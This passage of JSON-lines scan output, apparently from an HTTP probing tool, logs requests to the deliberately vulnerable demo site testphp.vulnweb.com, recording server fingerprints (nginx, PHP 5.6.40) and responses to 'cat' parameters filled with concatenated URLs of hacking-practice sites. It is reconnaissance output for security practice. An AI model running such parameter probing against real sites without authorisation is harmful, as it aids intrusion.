oducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-\",\"time\":\"344.55774ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5005,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:39.343406745Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2\",\"time\":\"352.873206ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5006,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:39.710245529Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop\",\"time\":\"353.178613ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5043,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:40.074335434Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop.php?id=13/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop.php?id=13/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop.php?id=13/\",\"time\":\"349.132466ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5054,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:40.171481659Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop.php?id=13/cloud\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop.php?id=13/cloud\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop.php?id=13/cloud\",\"time\":\"350.400001ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:40.360434418Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12\",\"time\":\"358.478669ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:40.822591149Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=13\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=13\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=13\",\"time\":\"350.049436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5015,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:40.974379731Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133\",\"time\":\"348.973789ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5016,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:42.638668408Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=10\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=10\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=10\",\"time\":\"358.546295ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5051,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:43.704257364Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104\",\"time\":\"354.365307ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5052,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:43.973547313Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/\",\"time\":\"356.80695ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:44.281696973Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5\",\"time\":\"344.016753ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.070694805Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/\",\"time\":\"357.062553ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.149007588Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6\",\"time\":\"350.016927ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.165501284Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/\",\"time\":\"353.022419ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.202485261Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7\",\"time\":\"340.008048ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.219576165Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/\",\"time\":\"347.845971ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.585759591Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8\",\"time\":\"346.113974ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.618571247Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/\",\"time\":\"358.080717ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.671768168Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9\",\"time\":\"345.442273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.696863428Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/\",\"time\":\"348.40575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.784180253Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10\",\"time\":\"353.756521ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.853112331Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/\",\"time\":\"339.604917ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.874870736Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11\",\"time\":\"353.217087ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:45.998082298Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104.http://www.itsecgames.com/5.http://damnvulnerableiosapp.com/6.http://www.gameofhacks.com/7.http://google-gruyere.appspot.com/8.https://www.hackthis.co.uk/9.https://www.hackthissite.org/10.https://overthewire.org/wargames/11.https://www.root-me.org/?lang=en\",\"time\":\"341.250678ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"w